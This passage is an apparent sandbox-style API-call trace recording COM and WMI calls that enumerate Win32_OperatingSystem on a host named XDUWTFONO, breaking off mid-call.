[0133.589] WbemDefPath:IWbemPath:GetText (in: This=0x73b0998, lFlags=4, puBuffLength=0x2ee910*=0xf, pszText="00000000000000" | out: puBuffLength=0x2ee910*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0133.590] CoGetContextToken (in: pToken=0x2ee750 | out: pToken=0x2ee750) returned 0x0 [0133.590] IUnknown:AddRef (This=0x73bd3d4) returned 0x3 [0133.590] IEnumWbemClassObject:Clone (in: This=0x73bd3d4, ppEnum=0x2ee910 | out: ppEnum=0x2ee910*=0x73bd49c) returned 0x0 [0133.590] IUnknown:QueryInterface (in: This=0x73bd49c, riid=0x740e1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee7d4 | out: ppvObject=0x2ee7d4*=0x73bd4a0) returned 0x0 [0133.591] IClientSecurity:QueryBlanket (in: This=0x73bd4a0, pProxy=0x73bd49c, pAuthnSvc=0x2ee824, pAuthzSvc=0x2ee820, pServerPrincName=0x2ee818, pAuthnLevel=0x2ee81c, pImpLevel=0x2ee80c, pAuthInfo=0x2ee810, pCapabilites=0x2ee814 | out: pAuthnSvc=0x2ee824*=0xa, pAuthzSvc=0x2ee820*=0x0, pServerPrincName=0x2ee818, pAuthnLevel=0x2ee81c*=0x6, pImpLevel=0x2ee80c*=0x2, pAuthInfo=0x2ee810, pCapabilites=0x2ee814*=0x1) returned 0x0 [0133.591] IUnknown:Release (This=0x73bd4a0) returned 0x1 [0133.591] IUnknown:QueryInterface (in: This=0x73bd49c, riid=0x740e10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee7c8 | out: ppvObject=0x2ee7c8*=0x7961fc) returned 0x0 [0133.591] IUnknown:QueryInterface (in: This=0x73bd49c, riid=0x740e1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee7c4 | out: ppvObject=0x2ee7c4*=0x73bd4a0) returned 0x0 [0133.591] IClientSecurity:SetBlanket (This=0x73bd4a0, pProxy=0x73bd49c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0133.593] IUnknown:Release (This=0x73bd4a0) returned 0x2 [0133.593] WbemLocator:IUnknown:Release (This=0x7961fc) returned 0x1 [0133.593] CoTaskMemFree (pv=0x795178) [0133.593] IUnknown:QueryInterface (in: This=0x73bd49c, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee3b0 | out: ppvObject=0x2ee3b0*=0x7961fc) returned 0x0 [0133.593] WbemLocator:IUnknown:QueryInterface (in: This=0x7961fc, riid=0x74cbfc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x2ee36c | out: ppvObject=0x2ee36c*=0x0) returned 0x80004002 [0133.593] WbemLocator:IUnknown:QueryInterface (in: This=0x7961fc, riid=0x74cbfe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2ee18c | out: ppvObject=0x2ee18c*=0x0) returned 0x80004002 [0133.594] WbemLocator:IUnknown:AddRef (This=0x7961fc) returned 0x3 [0133.594] WbemLocator:IUnknown:QueryInterface (in: This=0x7961fc, riid=0x74cbf90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x2edccc | out: ppvObject=0x2edccc*=0x0) returned 0x80004002 [0133.594] WbemLocator:IUnknown:QueryInterface (in: This=0x7961fc, riid=0x74cbf860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x2edc7c | out: ppvObject=0x2edc7c*=0x0) returned 0x80004002 [0133.594] WbemLocator:IUnknown:QueryInterface (in: This=0x7961fc, riid=0x74cac350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2edc88 | out: ppvObject=0x2edc88*=0x79615c) returned 0x0 [0133.595] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x79615c, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x2edc90 | out: pCid=0x2edc90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0133.595] WbemLocator:IUnknown:Release (This=0x79615c) returned 0x3 [0133.595] CoGetContextToken (in: pToken=0x2edce8 | out: pToken=0x2edce8) returned 0x0 [0133.595] CoGetContextToken (in: pToken=0x2ee0f0 | out: pToken=0x2ee0f0) returned 0x0 [0133.595] WbemLocator:IUnknown:QueryInterface (in: This=0x7961fc, riid=0x74cbfb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee180 | out: ppvObject=0x2ee180*=0x7961e4) returned 0x0 [0133.595] WbemLocator:IRpcOptions:Query (in: This=0x7961e4, pPrx=0x7961fc, dwProperty=2, pdwValue=0x2ee1a8 | out: pdwValue=0x2ee1a8) returned 0x80004002 [0133.595] WbemLocator:IUnknown:Release (This=0x7961e4) returned 0x3 [0133.595] WbemLocator:IUnknown:Release (This=0x7961fc) returned 0x2 [0133.595] CoGetContextToken (in: pToken=0x2ee6c0 | out: pToken=0x2ee6c0) returned 0x0 [0133.595] CoGetContextToken (in: pToken=0x2ee620 | out: pToken=0x2ee620) returned 0x0 [0133.595] WbemLocator:IUnknown:QueryInterface (in: This=0x7961fc, riid=0x2ee6f0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x2ee6ec | out: ppvObject=0x2ee6ec*=0x73bd49c) returned 0x0 [0133.595] IUnknown:AddRef (This=0x73bd49c) returned 0x4 [0133.595] IUnknown:Release (This=0x73bd49c) returned 0x3 [0133.595] IUnknown:Release (This=0x73bd49c) returned 0x2 [0133.595] IUnknown:Release (This=0x73bd3d4) returned 0x2 [0133.595] SysStringLen (param_1=0x0) returned 0x0 [0133.596] IEnumWbemClassObject:Reset (This=0x73bd49c) returned 0x0 [0133.654] CoTaskMemAlloc (cb=0x4) returned 0x76e3b0 [0133.657] IEnumWbemClassObject:Next (in: This=0x73bd49c, lTimeout=-1, uCount=0x1, apObjects=0x76e3b0, puReturned=0x2232cac | out: apObjects=0x76e3b0*=0x73bd4d8, puReturned=0x2232cac*=0x1) returned 0x0 [0133.661] IUnknown:QueryInterface (in: This=0x73bd4d8, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2edf70 | out: ppvObject=0x2edf70*=0x73bd4d8) returned 0x0 [0133.661] IUnknown:QueryInterface (in: This=0x73bd4d8, riid=0x74cbfc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x2edf2c | out: ppvObject=0x2edf2c*=0x0) returned 0x80004002 [0133.662] IUnknown:QueryInterface (in: This=0x73bd4d8, riid=0x74cbfe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2edd4c | out: ppvObject=0x2edd4c*=0x0) returned 0x80004002 [0133.662] IUnknown:AddRef (This=0x73bd4d8) returned 0x3 [0133.662] IUnknown:QueryInterface (in: This=0x73bd4d8, riid=0x74cbf90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x2ed88c | out: ppvObject=0x2ed88c*=0x0) returned 0x80004002 [0133.662] IUnknown:QueryInterface (in: This=0x73bd4d8, riid=0x74cbf860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x2ed83c | out: ppvObject=0x2ed83c*=0x0) returned 0x80004002 [0133.662] IUnknown:QueryInterface (in: This=0x73bd4d8, riid=0x74cac350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ed848 | out: ppvObject=0x2ed848*=0x73bd4dc) returned 0x0 [0133.662] IMarshal:GetUnmarshalClass (in: This=0x73bd4dc, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x2ed850 | out: pCid=0x2ed850*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0133.662] IUnknown:Release (This=0x73bd4dc) returned 0x3 [0133.662] CoGetContextToken (in: pToken=0x2ed8a8 | out: pToken=0x2ed8a8) returned 0x0 [0133.662] CoGetContextToken (in: pToken=0x2edcb0 | out: pToken=0x2edcb0) returned 0x0 [0133.662] IUnknown:QueryInterface (in: This=0x73bd4d8, riid=0x74cbfb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2edd40 | out: ppvObject=0x2edd40*=0x0) returned 0x80004002 [0133.662] IUnknown:Release (This=0x73bd4d8) returned 0x2 [0133.662] CoGetContextToken (in: pToken=0x2ee280 | out: pToken=0x2ee280) returned 0x0 [0133.662] CoGetContextToken (in: pToken=0x2ee1e0 | out: pToken=0x2ee1e0) returned 0x0 [0133.662] IUnknown:QueryInterface (in: This=0x73bd4d8, riid=0x2ee2b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x2ee2ac | out: ppvObject=0x2ee2ac*=0x73bd4d8) returned 0x0 [0133.662] IUnknown:AddRef (This=0x73bd4d8) returned 0x4 [0133.663] IUnknown:Release (This=0x73bd4d8) returned 0x3 [0133.663] IUnknown:Release (This=0x73bd4d8) returned 0x2 [0133.663] CoTaskMemFree (pv=0x76e3b0) [0133.663] CoGetContextToken (in: pToken=0x2ee5f0 | out: pToken=0x2ee5f0) returned 0x0 [0133.663] IUnknown:AddRef (This=0x73bd4d8) returned 0x3 [0133.663] CoTaskMemAlloc (cb=0x4) returned 0x76e3b0 [0133.663] IEnumWbemClassObject:Next (in: This=0x73bd49c, lTimeout=-1, uCount=0x1, apObjects=0x76e3b0, puReturned=0x2232cac | out: apObjects=0x76e3b0*=0x0, puReturned=0x2232cac*=0x0) returned 0x1 [0133.663] CoTaskMemFree (pv=0x76e3b0) [0133.663] CoGetContextToken (in: pToken=0x2ee760 | out: pToken=0x2ee760) returned 0x0 [0133.663] IUnknown:AddRef (This=0x73bd3d4) returned 0x3 [0133.663] IEnumWbemClassObject:Clone (in: This=0x73bd3d4, ppEnum=0x2ee920 | out: ppEnum=0x2ee920*=0x73c01dc) returned 0x0 [0133.664] IUnknown:QueryInterface (in: This=0x73c01dc, riid=0x740e1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee7e4 | out: ppvObject=0x2ee7e4*=0x73c01e0) returned 0x0 [0133.664] IClientSecurity:QueryBlanket (in: This=0x73c01e0, pProxy=0x73c01dc, pAuthnSvc=0x2ee834, pAuthzSvc=0x2ee830, pServerPrincName=0x2ee828, pAuthnLevel=0x2ee82c, pImpLevel=0x2ee81c, pAuthInfo=0x2ee820, pCapabilites=0x2ee824 | out: pAuthnSvc=0x2ee834*=0xa, pAuthzSvc=0x2ee830*=0x0, pServerPrincName=0x2ee828, pAuthnLevel=0x2ee82c*=0x6, pImpLevel=0x2ee81c*=0x2, pAuthInfo=0x2ee820, pCapabilites=0x2ee824*=0x1) returned 0x0 [0133.664] IUnknown:Release (This=0x73c01e0) returned 0x1 [0133.664] IUnknown:QueryInterface (in: This=0x73c01dc, riid=0x740e10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee7d8 | out: ppvObject=0x2ee7d8*=0x7963dc) returned 0x0 [0133.664] IUnknown:QueryInterface (in: This=0x73c01dc, riid=0x740e1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee7d4 | out: ppvObject=0x2ee7d4*=0x73c01e0) returned 0x0 [0133.664] IClientSecurity:SetBlanket (This=0x73c01e0, pProxy=0x73c01dc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0133.665] IUnknown:Release (This=0x73c01e0) returned 0x2 [0133.665] WbemLocator:IUnknown:Release (This=0x7963dc) returned 0x1 [0133.665] CoTaskMemFree (pv=0x795178) [0133.666] IUnknown:QueryInterface (in: This=0x73c01dc, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee3c0 | out: ppvObject=0x2ee3c0*=0x7963dc) returned 0x0 [0133.666] WbemLocator:IUnknown:QueryInterface (in: This=0x7963dc, riid=0x74cbfc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x2ee37c | out: ppvObject=0x2ee37c*=0x0) returned 0x80004002 [0133.666] WbemLocator:IUnknown:QueryInterface (in: This=0x7963dc, riid=0x74cbfe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2ee19c | out: ppvObject=0x2ee19c*=0x0) returned 0x80004002 [0133.666] WbemLocator:IUnknown:AddRef (This=0x7963dc) returned 0x3 [0133.666] WbemLocator:IUnknown:QueryInterface (in: This=0x7963dc, riid=0x74cbf90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x2edcdc | out: ppvObject=0x2edcdc*=0x0) returned 0x80004002 [0133.667] WbemLocator:IUnknown:QueryInterface (in: This=0x7963dc, riid=0x74cbf860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x2edc8c | out: ppvObject=0x2edc8c*=0x0) returned 0x80004002 [0133.667] WbemLocator:IUnknown:QueryInterface (in: This=0x7963dc, riid=0x74cac350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2edc98 | out: ppvObject=0x2edc98*=0x79633c) returned 0x0 [0133.667] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x79633c, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x2edca0 | out: pCid=0x2edca0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0133.667] WbemLocator:IUnknown:Release (This=0x79633c) returned 0x3 [0133.667] CoGetContextToken (in: pToken=0x2edcf8 | out: pToken=0x2edcf8) returned 0x0 [0133.667] CoGetContextToken (in: pToken=0x2ee100 | out: pToken=0x2ee100) returned 0x0 [0133.667] WbemLocator:IUnknown:QueryInterface (in: This=0x7963dc, riid=0x74cbfb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ee190 | out: ppvObject=0x2ee190*=0x7963c4) returned 0x0 [0133.667] WbemLocator:IRpcOptions:Query (in: This=0x7963c4, pPrx=0x7963dc, dwProperty=2, pdwValue=0x2ee1b8 | out: pdwValue=0x2ee1b8) returned 0x80004002 [0133.667] WbemLocator:IUnknown:Release (This=0x7963c4) returned 0x3 [0133.667] WbemLocator:IUnknown:Release (This=0x7963dc) returned 0x2 [0133.667] CoGetContextToken (in: pToken=0x2ee6d0 | out: pToken=0x2ee6d0) returned 0x0 [0133.667] CoGetContextToken (in: pToken=0x2ee630 | out: pToken=0x2ee630) returned 0x0 [0133.667] WbemLocator:IUnknown:QueryInterface (in: This=0x7963dc, riid=0x2ee700*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x2ee6fc | out: ppvObject=0x2ee6fc*=0x73c01dc) returned 0x0 [0133.667] IUnknown:AddRef (This=0x73c01dc) returned 0x4 [0133.667] IUnknown:Release (This=0x73c01dc) returned 0x3 [0133.668] IUnknown:Release (This=0x73c01dc) returned 0x2 [0133.668] IUnknown:Release (This=0x73bd3d4) returned 0x2 [0133.668] SysStringLen (param_1=0x0) returned 0x0 [0133.668] IEnumWbemClassObject:Reset (This=0x73c01dc) returned 0x0 [0133.668] CoTaskMemAlloc (cb=0x4) returned 0x7a0708 [0133.668] IEnumWbemClassObject:Next (in: This=0x73c01dc, lTimeout=-1, uCount=0x1, apObjects=0x7a0708, puReturned=0x2232d90 | out: apObjects=0x7a0708*=0x73c0218, puReturned=0x2232d90*=0x1) returned 0x0 [0133.671] IUnknown:QueryInterface (in: This=0x73c0218, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2edf80 | out: ppvObject=0x2edf80*=0x73c0218) returned 0x0 [0133.671] IUnknown:QueryInterface (in: This=0x73c0218, riid=0x74cbfc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x2edf3c | out: ppvObject=0x2edf3c*=0x0) returned 0x80004002 [0133.671] IUnknown:QueryInterface (in: This=0x73c0218, riid=0x74cbfe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x2edd5c | out: ppvObject=0x2edd5c*=0x0) returned 0x80004002 [0133.671] IUnknown:AddRef (This=0x73c0218) returned 0x3 [0133.671] IUnknown:QueryInterface (in: This=0x73c0218, riid=0x74cbf90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x2ed89c | out: ppvObject=0x2ed89c*=0x0) returned 0x80004002 [0133.671] IUnknown:QueryInterface (in: This=0x73c0218, riid=0x74cbf860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x2ed84c | out: ppvObject=0x2ed84c*=0x0) returned 0x80004002 [0133.671] IUnknown:QueryInterface (in: This=0x73c0218, riid=0x74cac350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2ed858 | out: ppvObject=0x2ed858*=0x73c021c) returned 0x0 [0133.671] IMarshal:GetUnmarshalClass (in: This=0x73c021c, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x2ed860 | out: pCid=0x2ed860*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0133.671] IUnknown:Release (This=0x73c021c) returned 0x3 [0133.671] CoGetContextToken (in: pToken=0x2ed8b8 | out: pToken=0x2ed8b8) returned 0x0 [0133.671] CoGetContextToken (in: pToken=0x2edcc0 | out: pToken=0x2edcc0) returned 0x0 [0133.671] IUnknown:QueryInterface (in: This=0x73c0218, riid=0x74cbfb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2edd50 | out: ppvObject=0x2edd50*=0x0) returned 0x80004002 [0133.671] IUnknown:Release (This=0x73c0218) returned 0x2 [0133.671] CoGetContextToken (in: pToken=0x2ee290 | out: pToken=0x2ee290) returned 0x0 [0133.671] CoGetContextToken (in: pToken=0x2ee1f0 | out: pToken=0x2ee1f0) returned 0x0 [0133.672] IUnknown:QueryInterface (in: This=0x73c0218, riid=0x2ee2c0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x2ee2bc | out: ppvObject=0x2ee2bc*=0x73c0218) returned 0x0 [0133.672] IUnknown:AddRef (This=0x73c0218) returned 0x4 [0133.672] IUnknown:Release (This=0x73c0218) returned 0x3 [0133.672] IUnknown:Release (This=0x73c0218) returned 0x2 [0133.672] CoTaskMemFree (pv=0x7a0708) [0133.672] CoGetContextToken (in: pToken=0x2ee600 | out: pToken=0x2ee600) returned 0x0 [0133.672] IUnknown:AddRef (This=0x73c0218) returned 0x3 [0133.673] IWbemClassObject:Get (in: This=0x73c0218, wszName="__GENUS", lFlags=0, pVal=0x2ee910*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ee990*=0, plFlavor=0x2ee98c*=0 | out: pVal=0x2ee910*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x2ee990*=3, plFlavor=0x2ee98c*=64) returned 0x0 [0133.673] IWbemClassObject:Get (in: This=0x73c0218, wszName="__PATH", lFlags=0, pVal=0x2ee8f4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ee978*=0, plFlavor=0x2ee974*=0 | out: pVal=0x2ee8f4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"", varVal2=0x0), pType=0x2ee978*=8, plFlavor=0x2ee974*=64) returned 0x0 [0133.673] SysStringByteLen (bstr="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x7e [0133.673] SysStringByteLen (bstr="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x7e [0133.674] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x31c [0133.674] SetEvent (hEvent=0x254) returned 1 [0133.674] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x2ee8cc*=0x31c, lpdwindex=0x2ee6ec | out: lpdwindex=0x2ee6ec) returned 0x0 [0133.676] CoGetContextToken (in: pToken=0x2ee798 | out: pToken=0x2ee798) returned 0x0 [0133.676] CoGetContextToken (in: pToken=0x2ee6f8 | out: pToken=0x2ee6f8) returned 0x0 [0133.676] WbemDefPath:IUnknown:QueryInterface (in: This=0x73bca30, riid=0x2ee7c8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x2ee7c4 | out: ppvObject=0x2ee7c4*=0x73bca30) returned 0x0 [0133.676] WbemDefPath:IUnknown:AddRef (This=0x73bca30) returned 0x3 [0133.676] WbemDefPath:IUnknown:Release (This=0x73bca30) returned 0x2 [0133.676] WbemDefPath:IWbemPath:SetText (This=0x73bca30, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_OperatingSystem.CSName=\"XDUWTFONO\"") returned 0x0 [0133.676] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x73b0998, puCount=0x2ee94c | out: puCount=0x2ee94c*=0x2) returned 0x0 [0133.676] WbemDefPath:IWbemPath:GetText (in: This=0x73b0998, lFlags=4, puBuffLength=0x2ee948*=0x0, pszText=0x0 | out: puBuffLength=0x2ee948*=0xf, pszText=0x0) returned 0x0 [0133.676] WbemDefPath:IWbemPath:GetText (in: This=0x73b0998, lFlags=4, puBuffLength=0x2ee948*=0xf, pszText="00000000000000" | out: puBuffLength=0x2ee948*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0133.677] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x73b0998, puCount=0x2ee940 | out: puCount=0x2ee940*=0x2) returned 0x0 [0133.677] WbemDefPath:IWbemPath:GetText (in: This=0x73b0998, lFlags=4, puBuffLength=0x2ee93c*=0x0, pszText=0x0 | out: puBuffLength=0x2ee93c*=0xf, pszText=0x0) returned 0x0 [0133.677] WbemDefPath:IWbemPath:GetText (in: This=0x73b0998, lFlags=4, puBuffLength=0x2ee93c*=0xf, pszText="00000000000000" | out: puBuffLength=0x2ee93c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0133.677] IWbemClassObject:Get (in: This=0x73c0218, wszName="Name", lFlags=0, 